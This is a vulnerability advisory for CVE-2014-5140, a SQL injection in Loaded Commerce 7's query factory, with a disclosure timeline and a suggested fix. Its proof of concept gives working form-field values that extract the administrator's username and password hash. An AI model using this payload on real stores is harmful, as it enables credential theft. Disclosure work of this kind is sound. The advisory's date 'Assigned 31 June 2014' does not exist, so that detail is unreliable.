Skip to content
cyberexploits
webappphptext

LoadedCommerce7 - Systemic Query Factory

LoadedCommerce7 - Systemic Query Factory

Published on 2014-09-07

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/34552.txt7eac4c3a
raw
Title:     LoadedCommerce7 Systemic Query Factory Vulnerability



Advisory:  http://breaking.technology/advisories/CVE-2014-5140.txt



Credits:   Discovered by Breaking Technology Research Labs 2014-06-30



Reference: CVE-2014-5140 - Assigned 31 June 2014



Timeline:

           Vendor notified - 29 July 2014

           Vendor confirmed exploit 30 July 2014





Severity:           Critical

Attack Complexity:  Minimal

Classification:     SQL injection, unsafe string replacement



Description:



	Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection.



Proof of Concept:



	Have a valid customer account and create a new contact in your address book using the following values.





	First name: :entry_lastname,

	Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#



	The new contact will be added to your address book with the admin hash as the contact's street address



Suggested Fix:

	Sanitize all user input before using it as any part of a query-- specifically remove or encode the colon (:) character before passing it to a query value.  A similar fix was issued for tomatocart, available at

        https://github.com/tomatocart/TomatoCart-v1/pull/238







View on GitHub